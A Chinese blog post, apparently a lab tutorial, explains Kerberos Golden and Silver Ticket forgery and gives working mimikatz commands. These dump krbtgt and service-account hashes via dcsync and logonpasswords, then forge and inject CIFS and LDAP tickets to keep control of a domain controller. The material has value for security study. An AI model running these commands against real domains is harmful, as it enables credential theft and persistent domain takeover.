黄金/白银票据制作

已于 2024-08-29 10:59:11 修改
阅读量1k 收藏 9
点赞数 36
文章标签: 网络 网络安全
于 2024-08-29 10:55:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67925097/article/details/141635790
版权

免责声明:该文章仅提供学习交流,若用于违法行为与本人无关

目录

一、黄金票据

1、黄金票据原理

2、黄金票据制作前提

3、制作过程

(1)域内机器win7访问域控的C$的文件目录,被拒绝访问

(2)在域控机器上收集制作黄金票据所需要的数据即域的SID、krbtgt的NTLM HASH、域名

(3)制作黄金票据(TGT)

注意首先要清除原有票据

在Access下的Golden Ticket进行黄金票据制作

需要填入伪造的用户、域名、域的SID号、krbtgt的NTLM HASH

伪造票据成功,票据注入内存成功

二、白银票据

        1、白银票据原理

        2、白银票据制作前提

        3、制作过程

        (1)域内机器win7访问域控的C$的文件目录,被拒绝访问

        (2)在域控机器收集域名、域SID号、服务的NTLM HASH

(3)伪造访问CIFS服务的ST票据

票据伪造并注入成功

一、黄金票据

1、黄金票据原理

      黄金票据即为kerberos认证过程中的票据授予票据即(TGT)和Logon Session Key(CT_SK),TGT票据是由域控的krbtgt用户的NTLM HASH加密和签名的又是固定的,并且身份认证服务(AS)返回的CT_SK并不会存储在密钥分发中心(KDC)中。而且有了TGT票据Client和票据授予服务(TGS)交互时不会进行AS认证,即只要krbtgt密码不被修改一直可以控制域控。

2、黄金票据制作前提

      控制了域控并且使用域管理员登录或者提权的System用户登录、知道域的SID号和域名 、域的krbtgt用户的NTLM HASH,即可以伪造域黄金票据

3、制作过程

        工具:Cobalt Strike,windows 2012为域控机器,域内机器windows 7 

        用户:域控登录用户administrator为域管用户,域内机器登录用户为win7普通用户

(1)域内机器win7访问域控的C$的文件目录,被拒绝访问

(2)在域控机器上收集制作黄金票据所需要的数据即域的SID、krbtgt的NTLM HASH、域名
whoami /user   # 查看域的sid号

 

net config workstation  # 查看域信息

mimikatz lsadump::dcsync /domain:xxx.com /user:krbtgt  # 获取krbtgt的NTLM HASH

(3)制作黄金票据(TGT)
注意首先要清除原有票据
mimikatz kerberos::purge   # 清除票据
mimikatz kerberos::tgt     # 查看票据

在Access下的Golden Ticket进行黄金票据制作

需要填入伪造的用户、域名、域的SID号、krbtgt的NTLM HASH

伪造票据成功,票据注入内存成功

二、白银票据

        1、白银票据原理

                白银票据为kerberos认证过程中票据授予服务(TGS)返回给客户端的服务授予票据(ST),ST票据是由服务账号的NTLM HASH加密的,即获取服务的NTLM HASH即可伪造白银票据,一张白银票据只能访问一种服务。

        2、白银票据制作前提

                控制了域控并且使用域管理员登录或者提权的System用户登录、知道域的SID号和域名 、服务用户的NTLM HASH,即可以伪造域白银票据

        3、制作过程

        (1)域内机器win7访问域控的C$的文件目录,被拒绝访问

        

        (2)在域控机器收集域名、域SID号、服务的NTLM HASH
whoami /user   # 查看域的sid号

mimikatz sekurlsa::logonpasswords    # 获取服务账号的NTLM HASH

        (3)伪造访问CIFS服务的ST票据
mimikatz kerberos::golden /domain:xxx.com /sid:S-1-5-21-1689890018-1579582480-2028816830 /target:win2012.xxx.com /service:cifs /rc4:413b48be059eb07bc98becbecf6e2955 /user:qqqq /ptt
票据伪造并注入成功

无法获取krbtgt服务的NTLM HASH,需要在注入一张访问LDAP服务的票据

伪造访问ldap服务的ST票据

mimikatz kerberos::golden /domain:xxx.com /sid:S-1-5-21-1689890018-1579582480-2028816830 /target:win2012.xxx.com /service:ldap /rc4:413b48be059eb07bc98becbecf6e2955 /user:qqqq /ptt

mimikatz lsadump::dcsync /domain:xxx.com /user:krbtgt  # 获取krbtgt的NTLM HASH

krbtgtNTLM HASH获取成功,管理员即使改了krbtgt密码并没有修服务账号密码即可继续控制域控

乐悠呦
关注
黄金白银实时看盘软件
07-10
直接利用外盘数据,制作出来的黄金白银看盘软件,有各种做多和做空信号,方便使用,准确率高,压缩包内有说明书。
黄金票据~
最新发布
Y22Lee的博客
06-04 1214
这里大家肯定有点矛盾,我既然都可以获取krbtgt,我直接使用域中的机器进行PTT就可以了,为什么还要用工作组中的机器(如果域中的机器有杀软呢?黄金票据制作有多种方式,黄金票据本质上是伪造TGT,既然是伪造所以在任何电脑上都可以伪造,生成的TGT票据就可以打入内存(PTT),从而实现对整个域的控制,接下来我们看一下如何伪造。黄金票据一般是伪造的TGT,生成这个TGT,不需要和KDC进行校验,金票可以在本地直接生成,生成的的金票在非域机器和域内机器都可以使用。第三步:获取伪造TGT使用的域SID和域名。
黄金票据白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 5725
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
内网渗透——黄金票据白银票据
来日可期的博客
10-11 3519
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
解析:Kerberos、黄金票据白银票据
Sgirll的博客
07-15 993
是指攻击者获取了合法用户的TGT(Ticket Granting Ticket)的信息,然后对TGT进行篡改以生成伪造的服务票据(TGS票据)。白银票据伪装成合法的TGS票据,用于访问特定的服务,但与黄金票据不同,白银票据只能访问被篡改的服务,无法获得对整个域的完全控制。服务访问:用户使用TGS票据向目标服务发送请求,目标服务使用TGS的私有秘钥解密票据并验证用户的身份。服务票据的颁发:TGS验证TGT,并为用户生成一个服务票据(TGS票据),该票据包含有关用户和目标服务的信息,并用TGS的私有秘钥加密。
一文搞懂黄金白银票据
m0_75218183的博客
06-29 1092
在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议。Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
域权限维持—黄金票据和白金票据
lza20001103的博客
04-15 770
域权限维持—黄金票据和白金票据
查询白银价格 黄金白银价钱走势查询 v1.0
10-21
较新黄金价格走势,较新白银价格走势,黄金走势,纸黄金实时价格。
黄金白银智能分析
04-02
黄金白银 多功能分析,不用注册,真接能用,而且是永久免费,
外汇黄金白银MT4超强一键下单
10-04
MT4(MetaTrader 4)是一款广泛应用于外汇(Forex)、黄金白银等金融衍生品交易的交易平台。它由MetaQuotes Software Corp开发,为投资者提供了实时报价、图表分析、交易执行以及自动化交易策略(专家顾问,EA)等...
免费黄金白银分析系统
12-10
免费黄金白银分析系统 一看免费的免费黄金白银分析系统
白银票据黄金票据的一些学习
dayouzi的博客
08-11 683
Golden Ticket(金票)是通过伪造TGT(TickerGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。对于攻击者来说,只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1143
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
域渗透之黄金票据白银票据
dys的博客
07-19 600
黄金票据白银票据 kerberos协议
域权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 2053
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
一文了解黄金票据白银票据
热门推荐
闵行小鱼塘
05-13 1万+
某老哥的一次面试里问到了这个问题,故来做一番了解:该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiwi)进行了演示,该演讲提出了Kerberos协议实现过程中的设计逻辑缺陷,也就是说Windows所有使用Kerberos的场景中都可以进行此类攻击
内网渗透-(黄金票据白银票据)详解(一)
duoba_an的博客
03-31 2054
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
域权限维持-黄金/白银票据详解
内心不种满鲜花就会长满杂草
04-19 2296
在域环境中进行权限维持,谈的比较多的便是票据,分为白银票据黄金票据, 其原理都是基于Kerberos认证。黄金票据伪造的是域管下发给用户的TGT,而白银票据则是伪造的 ST。
内网中黄金票据白银票据的区别
05-14
在内网中,黄金票据白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它的使用应该被高度限制并受到严格的监管。 白银票据则是一个用于身份验证的较低级别的加密令牌。它通常被用于授权用户在网络中执行一些普通的任务,例如打印文件或者访问共享文件夹。白银票据通常具有比黄金票据更低的访问权限,因此它的使用范围更广,可以被更多的用户所使用。 总的来说,黄金票据白银票据都是用于身份验证的加密令牌,它们的主要区别在于权限级别的高低。在内网中,这些票据的使用应该受到高度的限制和监管,以确保网络的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值